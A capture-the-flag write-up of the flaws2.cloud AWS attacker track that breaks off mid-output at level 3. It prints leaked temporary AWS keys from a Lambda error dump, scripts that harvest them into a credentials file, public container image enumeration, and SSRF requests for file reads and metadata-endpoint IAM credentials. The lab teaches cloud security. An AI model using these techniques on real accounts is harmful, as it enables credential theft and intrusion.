Lab - CTF:Flaw2.cloud [attacker and defender]
[toc]
CTF:Flaw2
Attacker Track
Level 1 - sourse code api input error
For this level, you'll need to enter the correct PIN code. The correct PIN is 100 digits long, so brute forcing it won't help.https://level1.flaws2.cloud/
1
2
3
4
5
6
aws s3 ls s3://level1.flaws2.cloud/
# An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
aws s3 ls s3://level1.flaws2.cloud/
--profile default
# An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
- give the wrong code
1
2
3
# code: 1234
https://level1.flaws2.cloud/index.htm?incorrect
# The input validation is only done by the javascript. Get around it and pass a pin code that isn't a number.
- source code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
<body>
<div class="content">
<div class="row">
<div class="col-sm-12">
<center><h1>Level 1</h1></center>
<script type="text/javascript">
// There is a client-side check on the parameter, which needs to be a number.
// This suggests that the backend application only accepts numbers.
function validateForm() {
var code = document.forms["myForm"]["code"].value;
if (! ( !isNaN(parseFloat(code)) && isFinite(code)) ) {
alert("Code must be a number");
return false;
}
}
</script>
<!-- Form data is validated as follows: -->
<form name="myForm" action="https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1" onsubmit="return validateForm()">
Code:
<input type="text" name="code" value="1234">
<input type="submit" value="Submit">
</form>
</div>
</div>
</div>
<script type="text/javascript">
if (window.location.search.substring(1).includes("incorrect")) {
document.getElementById("incorrect").innerHTML = "<b style='background-color:#ffbabf; border-radius:3px; border: 2px solid #adadad; padding:5px;'>Incorrect. Try again.</b>";
}
</script>
</body>
</html>
<!-- the form submitting a request to https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=1234 -->
<!-- change the parameter https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=a -->
<!-- https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?a=a -->
Error, malformed input
{
"PATH":"/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin",
"LD_LIBRARY_PATH":"/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib",
"LANG":"en_US.UTF-8","TZ":":UTC",
"_HANDLER":"index.handler",
"LAMBDA_TASK_ROOT":"/var/task",
"LAMBDA_RUNTIME_DIR":"/var/runtime",
"AWS_REGION":"us-east-1",
"AWS_DEFAULT_REGION":"us-east-1",
"AWS_LAMBDA_LOG_GROUP_NAME":"/aws/lambda/level1",
"AWS_LAMBDA_LOG_STREAM_NAME":"2021/01/25/[$LATEST]8a9f5ac2839044cb8a620bcb9cb70ed1",
"AWS_LAMBDA_FUNCTION_NAME":"level1",
"AWS_LAMBDA_FUNCTION_MEMORY_SIZE":"128",
"AWS_LAMBDA_FUNCTION_VERSION":"$LATEST",
"_AWS_XRAY_DAEMON_ADDRESS":"169.254.79.2",
"_AWS_XRAY_DAEMON_PORT":"2000",
"AWS_XRAY_DAEMON_ADDRESS":"169.254.79.2:2000",
"AWS_XRAY_CONTEXT_MISSING":"LOG_ERROR",
"_X_AMZN_TRACE_ID":"Root=1-600e5095-29b6c96c385001134d332a25;Parent=4e64534f4cbdf814;Sampled=0",
"AWS_EXECUTION_ENV":"AWS_Lambda_nodejs8.10",
"AWS_LAMBDA_INITIALIZATION_TYPE":"on-demand",
"NODE_PATH":"/opt/nodejs/node8/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task:/var/runtime/node_modules",
"AWS_ACCESS_KEY_ID":"ASIAZQNB3KHGKLHAFAAT",
"AWS_SECRET_ACCESS_KEY":"+LceTa5RtXh+OlVEnXMLyaq2QXwve67hjp6ksviU",
"AWS_SESSION_TOKEN":"IQoJb3JpZ2luX2VjEEsaCXVzLWVhc3QtMSJHMEUCIQCcaAlYq0OSI2qGz+PICgco09jMSVNgGKLU8SxVUEHPHAIgOv0OZTFJWs4fAuxulHpgDeYrxBPcN0Wapi4WaXnADhgqxQEIMxACGgw2NTM3MTEzMzE3ODgiDGiNRGqIak8fzySIayqiAR0IAnD/tBb54jELO69AhP4CQu3eJXF9pD+q22CT+14pjX3XS6oiqJoR2DS5XDOz1pxjtFt0hBkpqALPZOyh0Us1/cvAnPxL7THpdK7VPa8sMxomx+uONY7d7RV9IT33YC3JXtI1hO83x+NIxod13MYnE1Zqle0bidcB85aWvvlc/HftkP/hj4MfxqMcnoWMDYZTmc+6sVFuIongz4R1goIGYDD6tsGABjrgAVHkPQTsWYuVouK5nsGM4qcvcr3ITzhEnDukL6EAwrT9nWKkBkVE8B8/92ZOdxouAj3XxYLugJIgk96T2pT816MsGYvWbrYe3O9UOJFZ3OGJoCKtsSmNJE/S95JLCVJ+leaUvRuZnSm7NyrpX9viOju2KoiZVpDUx9MsmW39lrMA4ee5GfptC7UKVlxoyxVp0e/LFz4gGxMz3kVx9COPdt0cDD+UiB8enmOsoLiRv5XcLdE0A2NkZFm0MhrTcgc5PR/smtp/78ueppUPIevuvilZUUCnAEhrpqaelzzxa2je"}
- configure the aws credential
1
2
3
4
5
6
7
8
9
10
11
12
13
$ aws s3 ls s3://level1.flaws2.cloud/ --profile flaws2
# PRE img/
# 2018-11-20 15:55:05 17102 favicon.ico
# 2018-11-20 21:00:22 1905 hint1.htm
# 2018-11-20 21:00:22 2226 hint2.htm
# 2018-11-20 21:00:22 2536 hint3.htm
# 2018-11-20 21:00:23 2460 hint4.htm
# 2018-11-20 21:00:17 3000 index.htm
# 2018-11-20 21:00:17 1899 secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html
https://level1.flaws2.cloud/secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html
# The next level is at https://level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
Script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/bin/bash
INFILE=~/.aws/credentials
PROFILE='flaws2'
res=`curl -s 'https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=x' | tail -n1`
AWS_ACCESS_KEY_ID=`echo $res | jq -r .AWS_ACCESS_KEY_ID`
AWS_SECRET_ACCESS_KEY=`echo $res | jq -r .AWS_SECRET_ACCESS_KEY`
AWS_SESSION_TOKEN=`echo $res | jq -r .AWS_SESSION_TOKEN`
AWS_REGION=`echo $res | jq -r .AWS_REGION`
echo "[$PROFILE]
REGION = $AWS_REGION
AWS_ACCESS_KEY_ID = $AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY = $AWS_SECRET_ACCESS_KEY
AWS_SESSION_TOKEN = $AWS_SESSION_TOKEN
" | crudini --merge $INFILE
echo "Set creds for profile $PROFILE in $INFILE"
aws s3 ls s3://level1.flaws2.cloud/ \
--profile $PROFILE
echo "list the S3"
Lesson learned
Whereas EC2 instances obtain the credentials for their IAM roles from the metadata service at 169.254.169.254, AWS Lambda obtains those credentials from environmental variables.
- Often developers will dump environmental variables when error conditions occur in order to help them debug problems.
- dangerous as sensitive information can sometimes be found in environmental variables.
- the IAM role had privilieges to list the contents of a bucket which wasn’t needed for its operation.
- Best practice: Least Privilege strategy
- shouldn’t rely on input validation to happen only on the client side or at some point upstream from your code.
- AWS applications, especially serverless, are composed of many building blocks all chained together.
- Developers sometimes assume that something upstream has already performed input validation. In this case, the client data was validated by Javascript which could be bypasseed, which then passed into API Gateway and finally to the Lambda.
- Applications are often more complex than that, and these architectures can change over time, possibly breaking assumptions about where validation is supposed to occur.
Level 2 - public container image & build history
This next level is running as a container at https://container.target.flaws2.cloud/. - Just like S3 buckets, other resources on AWS can have open permissions. - I'll give you a hint that the ECR (Elastic Container Registry) is named "level2".https://level1.flaws2.cloud/
- If an ECR is public, list the images
aws ecr list-images --repository-name REPO_NAME --registry-id ACCOUNT_ID
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
# get account id aws sts get-caller-identity \ --profile flaws2 # { # "UserId": "AROAIBATWWYQXZTTALNCE:level1", # "Account": "653711331788", # "Arn": "arn:aws:sts::653711331788:assumed-role/level1/level1" # } # get the correct region: dig level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud # ;; ANSWER SECTION: # level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud. 5 IN A 52.217.37.195 nslookup 52.217.37.195 # Server: 192.168.1.1 # Address: 192.168.1.1#53 # Non-authoritative answer: # 195.37.217.52.in-addr.arpa name = s3-website-us-east-1.amazonaws.com. # list the images with: aws ecr list-images \ --repository-name level2 \ --registry-id 653711331788 \ --region us-east-1 # { # "imageIds": [ # { "imageDigest": "sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e", # "imageTag": "latest" } # ] # }
- the image is public
- two choices
- download it locally with docker, pull and investigate it with Docker commands
- or manually with the AWS CLI.
Option 1: Using the docker commands
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
# download it locally
# Retrieves a token that is valid for a specified registry for 12 hours
# and then it prints a docker login command with that authorisation token.
aws ecr get-login-password \
--profile flaws2 \
--region us-east-1 \
| docker login \
--username AWS \
--password-stdin \
653711331788.dkr.ecr.us-east-1.amazonaws.com
# Login Succeeded
# pull/download the image from the repository:
docker pull 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
# latest: Pulling from level2
# 7b8b6451c85f: Pull complete
# ...
# Digest: sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e
# Status: Downloaded newer image for 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
# 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
# verify it’s been pulled correctly:
docker image ls
# REPOSITORY TAG IMAGE ID CREATED SIZE
# 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2 latest 2d73de35b781 11 months ago 202M
# shows the final command executed and a number of read-only layers:
docker inspect 2d73de35b781
# [
# {
# "Id": "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621",
# "RepoTags": [ "653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest" ,
# "RepoDigests": [ "653711331788.dkr.ecr.us-east-1.amazonaws.com/level2@sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e" ],
# "Parent": "",
# "Comment": "",
# "Created": "2018-11-27T03:32:59.959842964Z",
# "Container": "ac1212c533fd9920b36cf3518caeb27b07e5efca6d40a0cfb07acc94c3f02055",
# "ContainerConfig": {
# "Hostname": "ac1212c533fd",
# "Domainname": "",
# "User": "",
# "AttachStdin": false,
# "AttachStdout": false,
# "AttachStderr": false,
# "ExposedPorts": { "80/tcp": {} },
# "Tty": false,
# "OpenStdin": false,
# "StdinOnce": false,
# "Env": [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ],
# "Cmd": [
# "/bin/sh",
# "-c",
# "#(nop) ",
# "CMD ["sh" "/var/www/html/start.sh"]"
# ],
# "ArgsEscaped": true,
# "Image": "sha256:6bb13d45a562a2f15ca30b6a895698b27231a190049f1d4489aeba4fa86a75fe",
# "Volumes": null,
# "WorkingDir": "",
# "Entrypoint": null,
# "OnBuild": null,
# "Labels": {}
# },
# "DockerVersion": "18.09.0",
# "Author": "",
# "Config": {
# "Hostname": "",
# "Domainname": "",
# "User": "",
# "AttachStdin": false,
# "AttachStdout": false,
# "AttachStderr": false,
# "ExposedPorts": { "80/tcp": {} },
# "Tty": false,
# "OpenStdin": false,
# "StdinOnce": false,
# "Env": [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ],
# "Cmd": [ "sh", "/var/www/html/start.sh" ],
# "ArgsEscaped": true,
# "Image": "sha256:6bb13d45a562a2f15ca30b6a895698b27231a190049f1d4489aeba4fa86a75fe",
# "Volumes": null,
# "WorkingDir": "",
# "Entrypoint": null,
# "OnBuild": null,
# "Labels": null
# },
# "Architecture": "amd64",
# "Os": "linux",
# "Size": 201856589,
# "VirtualSize": 201856589,
# "GraphDriver": {
# "Data": {
# "LowerDir": "/var/lib/docker/overlay2/fc6a91db2d4e9928b7df0f74ce049d7a0318b8d3df12048067cacd660107babf/diff:/var/lib/docker/overlay2/1227f5684004759eeb508df0cc01170a20a0e4d1189f6d4eca5dd627ed5e73f4/diff:/var/lib/docker/overlay2/7758b82766621d50d099516d6d242fc2892cd4ece364501f513a748453cdb4fd/diff:/var/lib/docker/overlay2/8990a089d5838857b06357ebea16a0e27594cb53124cb9f9f38673c2f4c03ab2/diff:/var/lib/docker/overlay2/a977553c8a3ff13a444f69a8422dc6df967e8659ba1e4cb43ce90c25a37eec87/diff:/var/lib/docker/overlay2/449cb11583af58566ca399ad4322e1b428618edec8234a51d9060e94892664a7/diff:/var/lib/docker/overlay2/e596d0bb1784b3ce06c161a02b03afa161c5b035df3c4fb0a07cf3518273171d/diff:/var/lib/docker/overlay2/2e938647f50e15ebf4566306fdd99de281821b2a071ad91a032196f3bcdbfe16/diff:/var/lib/docker/overlay2/aea4d9fb324436155ca54672f24e822170c5360cefd32c56ad61db534695d458/diff",
# "MergedDir": "/var/lib/docker/overlay2/a4fc2ea923e396aa3bbca3c39601f34063e59404b5b5f922cb4d7b1e09866522/merged",
# "UpperDir": "/var/lib/docker/overlay2/a4fc2ea923e396aa3bbca3c39601f34063e59404b5b5f922cb4d7b1e09866522/diff",
# "WorkDir": "/var/lib/docker/overlay2/a4fc2ea923e396aa3bbca3c39601f34063e59404b5b5f922cb4d7b1e09866522/work"
# },
# "Name": "overlay2"
# },
# "RootFS": {
# "Type": "layers",
# "Layers": [
# "sha256:41c002c8a6fd36397892dc6dc36813aaa1be3298be4de93e4fe1f40b9c358d99",
# "sha256:647265b9d8bc572a858ab25a300c07c0567c9124390fd91935430bf947ee5c2a",
# "sha256:819a824caf709f224c414a56a2fa0240ea15797ee180e73abe4ad63d3806cae5",
# "sha256:3db5746c911ad8c3398a6b72aa30580b25b6edb130a148beed4d405d9c345a29",
# "sha256:1c1ac3ae43d53b452e0dfb320a5c22cf8ff5e8068a7ecef6779600d14ad4751b",
# "sha256:bc16ef0350ee1577dfe09696bff225b40d241b26a359c146ffd5746a8ce18931",
# "sha256:5db51ba604f0593199b4d8705a21fe6b1bc6cee503f7468539f6a80aa3cc4750",
# "sha256:4e7b9bca030ac43814d0a6c6afed36f70fc2bb01a9dd84705358f424af1dae1e",
# "sha256:5494da4989bbd817e20ead7cbaa8985d9907db95ea07b3e212e2e483de767f1d",
# "sha256:67df634e1db11f3a6533ed051811c8290b69d7104550617dcc79303304cc78bb"
# ]
# },
# "Metadata": { "LastTagTime": "0001-01-01T00:00:00Z" }
# }
# ]
# view the commands used to create all the layers when the docker container was built:
docker history 2d73de35b781
# IMAGE CREATED CREATED BY SIZE COMMENT
# 2d73de35b781 11 months ago /bin/sh -c #(nop) CMD ["sh" "/var/www/html/… 0B
# <missing> 11 months ago /bin/sh -c #(nop) EXPOSE 80 0B
# <missing> 11 months ago /bin/sh -c #(nop) ADD file:d29d68489f34ad718… 49B
# <missing> 11 months ago /bin/sh -c #(nop) ADD file:f8fd45be7a30bffa5… 614B
# <missing> 11 months ago /bin/sh -c #(nop) ADD file:fd3724e587d17e4bc… 1.89kB
# <missing> 11 months ago /bin/sh -c #(nop) ADD file:b311a5fa51887368e… 999B
# <missing> 11 months ago /bin/sh -c htpasswd -b -c /etc/nginx/.htpass… 45B
# <missing> 11 months ago /bin/sh -c apt-get update && apt-get ins… 85.5MB
# <missing> 11 months ago /bin/sh -c #(nop) CMD ["/bin/bash"] 0B
# <missing> 11 months ago /bin/sh -c mkdir -p /run/systemd && echo 'do… 7B
# <missing> 11 months ago /bin/sh -c rm -rf /var/lib/apt/lists/* 0B
# <missing> 11 months ago /bin/sh -c set -xe && echo '#!/bin/sh' > /… 745B
# <missing> 11 months ago /bin/sh -c #(nop) ADD file:efec03b785a78c01a… 116MB
# the command to set up the password for HTTP Basic Authentication
# To get the full command
docker history 2d73de35b781 --no-trunc
# /bin/sh -c htpasswd -b -c /etc/nginx/.htpasswd flaws2 secret_password
Option 2: Using the AWS CLI
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
aws ecr batch-get-image \
--repository-name level2 \
--registry-id 653711331788 \
--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'
# see the multiple layers. We cold download any one of them based on its digest:
# {
# "images": [
# {
# "registryId": "653711331788",
# "repositoryName": "level2",
# "imageId": {
# "imageDigest": "sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e",
# "imageTag": "latest"
# },
# "imageManifest": "{
# "schemaVersion": 2,
# "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
# "config": {
# "mediaType": "application/vnd.docker.container.image.v1+json",
# "size": 5359,
# "digest": "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621"
# },
# "layers": [
# {"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
# "size": 43412182,
# "digest": "sha256:7b8b6451c85f072fd0d7961c97be3fe6e2f772657d471254f6d52ad9f158a580"},
# ...
# {"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
# "size": 213,
# "digest": "sha256:4fbdfdaee9ae20c6e877bd57838c6f93336573195f4aafcdec36fb4c4358a935"}]}",
# "imageManifestMediaType": "application/vnd.docker.distribution.manifest.v2+json"
# }
# ],
# "failures": []
# }
# Then for a given digest, use:
aws ecr get-download-url-for-layer \
--repository-name level2 \
--registry-id 653711331788 \
--layer-digest "sha256:7b8b6451c85f072fd0d7961c97be3fe6e2f772657d471254f6d52ad9f158a580" \
--profile flaws2 \
--region us-east-1
# {
# "downloadUrl": "https://prod-us-east-1-starport-layer-bucket.s3.us-east-1.amazonaws.com/dc26-653711331788-58b3a0a8-1806-5777-1315-c2d788e36c12/f1bebb74-3af2-4d58-8bbe-cfec79c8ceb3?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIAsdQOhmH4M61p6nNFud8rIbH3RwQb3gZ%2B57EWiWy7HIAiAK0dkKIkWSXt7Ya4zul8lhtAj%2BM7mGJbvj6S3VOB2aZSrvAghvEAIaDDU5MTEwNTkxNDk1MiIMGlBfaYcxW5mJ0cdIKswC2wjblU4%2FgtiyOYTEsNfxhTopf4aQyWzYGYGUdm079DUhfDhTg14x4IuTj4N9mMsFYk7HdVb0iNIeNiTMqM0R%2FpM13XOOwOU7huxSwJdc9zIpFw0wXrO16vSFo0zpnxCktAusBNaFgg%2Bp6LW4IbfdE6N5SmHSV9HEFB5Ds7aMXVJsHtu%2FL5Q0jD9eKlNepJ6hdImoODDgiWbqbLi%2BF%2BSKomBHfgWbF5ZlV6%2BrU24F9sAcy%2FXy3%2BgqyUlXzuaVY0uKLKrDoFRei1uqn49sPS3uWyKfa18CxJW8%2BAyi1M48fd3PhKO8d8nY6IqIAINTddIf4rD9nMWwWzDJjQdDP32i25qoobiX9P%2Feg8UYR5PlHeddd5PmxH4MfJ4svozjlxt9AHw%2FK4YlC%2FfRi6qmSYO4%2Fqck7YWRA%2BwDm1IaeWJLYpH5RmYfHZjkyHslOucw4MbOgAY66AHOu3rmP4tZ38mhLyrDvENoEpjQ5r1OE%2BP5gpOc%2FnWU0X4tMldfSkS%2BnLLmSJdI2AObR97Kot%2BeYmEj6lbMDEHcuJZSuGIlSsFDgehXb%2FT8GOGmy6MNqXi4hxT%2FsWMcdr8%2Bte%2F05er97ygPHST1pgIgWa%2F2oirALPRXC1%2BKdSut4bFpffaOyzT4XKINUkg8ultpfKmAVyzAVP92LTkEY5Cz5QsagZRUqXUcCXBlgigGW30UCszp1NJHzK1hnskBP8fh9DMbUsIl70iM3THrCR5UXDEvF0GbqgYZ0l1bp1W0zA5ZUodA%2Fo1r&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20210129T061958Z&X-Amz-SignedHeaders=host&X-Amz-Expires=3600&X-Amz-Credential=ASIAYTIFIPBEOQ76MFZB%2F20210129%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=953cc74b0fdbdb03046f3cafddb656527ff5114138c947efcf83a8f012531ef0",
# "layerDigest": "sha256:7b8b6451c85f072fd0d7961c97be3fe6e2f772657d471254f6d52ad9f158a580"
# }
wget "https://prod-us-east-1-st...a599458" -O layer.tar.gzip
# or just download the config file:
wget "https://prod-us-east-1-starport-layer-bucket.s3.us-east-1.amazonaws.com/dc26-653711331788-58b3a0a8-1806-5777-1315-c2d788e36c12/f1bebb74-3af2-4d58-8bbe-cfec79c8ceb3?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIAsdQOhmH4M61p6nNFud8rIbH3RwQb3gZ%2B57EWiWy7HIAiAK0dkKIkWSXt7Ya4zul8lhtAj%2BM7mGJbvj6S3VOB2aZSrvAghvEAIaDDU5MTEwNTkxNDk1MiIMGlBfaYcxW5mJ0cdIKswC2wjblU4%2FgtiyOYTEsNfxhTopf4aQyWzYGYGUdm079DUhfDhTg14x4IuTj4N9mMsFYk7HdVb0iNIeNiTMqM0R%2FpM13XOOwOU7huxSwJdc9zIpFw0wXrO16vSFo0zpnxCktAusBNaFgg%2Bp6LW4IbfdE6N5SmHSV9HEFB5Ds7aMXVJsHtu%2FL5Q0jD9eKlNepJ6hdImoODDgiWbqbLi%2BF%2BSKomBHfgWbF5ZlV6%2BrU24F9sAcy%2FXy3%2BgqyUlXzuaVY0uKLKrDoFRei1uqn49sPS3uWyKfa18CxJW8%2BAyi1M48fd3PhKO8d8nY6IqIAINTddIf4rD9nMWwWzDJjQdDP32i25qoobiX9P%2Feg8UYR5PlHeddd5PmxH4MfJ4svozjlxt9AHw%2FK4YlC%2FfRi6qmSYO4%2Fqck7YWRA%2BwDm1IaeWJLYpH5RmYfHZjkyHslOucw4MbOgAY66AHOu3rmP4tZ38mhLyrDvENoEpjQ5r1OE%2BP5gpOc%2FnWU0X4tMldfSkS%2BnLLmSJdI2AObR97Kot%2BeYmEj6lbMDEHcuJZSuGIlSsFDgehXb%2FT8GOGmy6MNqXi4hxT%2FsWMcdr8%2Bte%2F05er97ygPHST1pgIgWa%2F2oirALPRXC1%2BKdSut4bFpffaOyzT4XKINUkg8ultpfKmAVyzAVP92LTkEY5Cz5QsagZRUqXUcCXBlgigGW30UCszp1NJHzK1hnskBP8fh9DMbUsIl70iM3THrCR5UXDEvF0GbqgYZ0l1bp1W0zA5ZUodA%2Fo1r&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20210129T061958Z&X-Amz-SignedHeaders=host&X-Amz-Expires=3600&X-Amz-Credential=ASIAYTIFIPBEOQ76MFZB%2F20210129%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=953cc74b0fdbdb03046f3cafddb656527ff5114138c947efcf83a8f012531ef0" -O config
cat config | jq '. | fromjson'
# {
# "created": "2018-11-27T03:32:58.202361504Z",
# "created_by": "/bin/sh -c htpasswd -b -c /etc/nginx/.htpasswd flaws2 secret_password"
# },
# go to https://container.target.flaws2.cloud/
# Read about Level 3 at level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/bin/bash
INFILE=~/.aws/credentials
PROFILE='flaws2'
REPONAME='level2'
REGION='us-east-1'
RES=`curl -s 'https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=x' | tail -n1`
AWS_ACCESS_KEY_ID=`echo $RES | jq -r .AWS_ACCESS_KEY_ID`
AWS_SECRET_ACCESS_KEY=`echo $RES | jq -r .AWS_SECRET_ACCESS_KEY`
AWS_SESSION_TOKEN=`echo $RES | jq -r .AWS_SESSION_TOKEN`
AWS_REGION=`echo $RES | jq -r .AWS_REGION`
echo "[$PROFILE]
REGION = $AWS_REGION
AWS_ACCESS_KEY_ID = $AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY = $AWS_SECRET_ACCESS_KEY
AWS_SESSION_TOKEN = $AWS_SESSION_TOKEN
" | crudini --merge $INFILE
echo "-------Set creds for profile $PROFILE in $INFILE"
IDENTITY=`aws sts get-caller-identity \
--profile $PROFILE`
ACCOUNTID=`echo $IDENTITY | jq -r .Account`
echo "-------profile $PROFILE 's account id is $ACCOUNTID"
IMAGE=`aws ecr list-images \
--repository-name $REPONAME \
--registry-id $ACCOUNTID \
--region $REGION \
--profile $PROFILE`
IMAGETAGINFO=`echo $IMAGE | jq -r .imageIds[].imageTag`
echo "-------get the images tag $IMAGETAGINFO"
LAYERINFO=`aws ecr batch-get-image \
--repository-name $REPONAME \
--registry-id $ACCOUNTID \
--image-ids imageTag=$IMAGETAGINFO | jq '.images[].imageManifest | fromjson'`
LASTLAYERDIG=`echo $LAYERINFO | jq -r '.layers[0].digest'`
echo "-------get the latest images's digest $LASTLAYERDIG"
LAYERURL=`aws ecr get-download-url-for-layer \
--repository-name $REPONAME \
--registry-id $ACCOUNTID \
--layer-digest $LASTLAYERDIG \
--region $REGION \
--profile $PROFILE | jq -r .downloadUrl`
echo "-------download the layer of $LASTLAYERDIG"
wget $LAYERURL -O config
echo "-------check the config file"
cat config | jq
Lesson learned
There are lots of other resources on AWS that can be public
- but they are harder to brute-force for because you have to include not only the name of the resource, but also the the Account ID and region.
- They also can’t be searched with DNS records.
- However, it is still best to avoid having public resources.
Level 3 - proxy metadata to iam
The container's webserver you got access to includes a simple proxy that can be access with: - https://container.target.flaws2.cloud/proxy/https://flaws.cloud - or https://container.target.flaws2.cloud/proxy/https://neverssl.comlevel3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
- proxy program is mentioned in the container image actually
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
docker inspect 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2
# no ENTRYPOINT, and CMD = “sh /var/www/html/start.sh” .
nginxroot@e247007162e8:/var/www/html# cat proxy.py
https://container.target.flaws2.cloud/proxy/file:////var/www/html/proxy.py
# import SocketServer
# import SimpleHTTPServer
# import urllib
# import os
# PORT = 8000
# class Proxy(SimpleHTTPServer.SimpleHTTPRequestHandler):
# def do_GET(self):
# self.send_response(200)
# self.send_header("Content-type", "text/html")
# self.end_headers()
# # Remove starting slash
# self.path = self.path[1:]
# # Read the remote site
# response = urllib.urlopen(self.path)
# the_page = response.read(8192)
# # Return it
# self.wfile.write(bytes(the_page))
# self.wfile.close()
# httpd = SocketServer.ForkingTCPServer(('', PORT), Proxy)
# print "serving at port", PORT
# httpd.serve_forever()
nginxroot@e247007162e8:/var/www/html# cat /etc/nginx/sites-available/default
# server {
# listen 80 default_server;
# listen [::]:80 default_server;
# root /var/www/html;
# index index.html index.htm;
# merge_slashes off;
# server_name _;
# location / {
# try_files $uri $uri/ =404;
# auth_basic "Restricted Content";
# auth_basic_user_file /etc/nginx/.htpasswd;
# }
# location /debug {
# #perl_set $debug 'sub { return %ENV; }';
# #return 200 '${debug}';
# return 200 'debug';
# }
# location ~* ^/proxy/(.*)$ {
# limit_except GET {
# deny all;
# }
# limit_req zone=one burst=1;
# set $proxyuri '$1';
# proxy_limit_rate 4096;
# proxy_set_header X-Real-IP $remote_addr;
# proxy_set_header Host 'localhost';
# resolver 8.8.8.8;
# proxy_pass https://127.0.0.1:8000/$proxyuri;
# }
# }
just like before, a proxy retrieving and returning any URL we desire.
This will enable us to commit SSRF and potentially pivot within this account.
- to query the ECS task’s Metadata:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
https://container.target.flaws2.cloud/proxy169.254.169.254/
https://container.target.flaws2.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials
https://container.target.flaws2.cloud/proxy/https://169.254.169.254/
# Empty response.
# That IP is for EC2 instances, not ECS Tasks.
# ECS Task Metadata Endpoints.
https://container.target.flaws2.cloud/proxy/https://169.254.170.2/v2/metadata
{
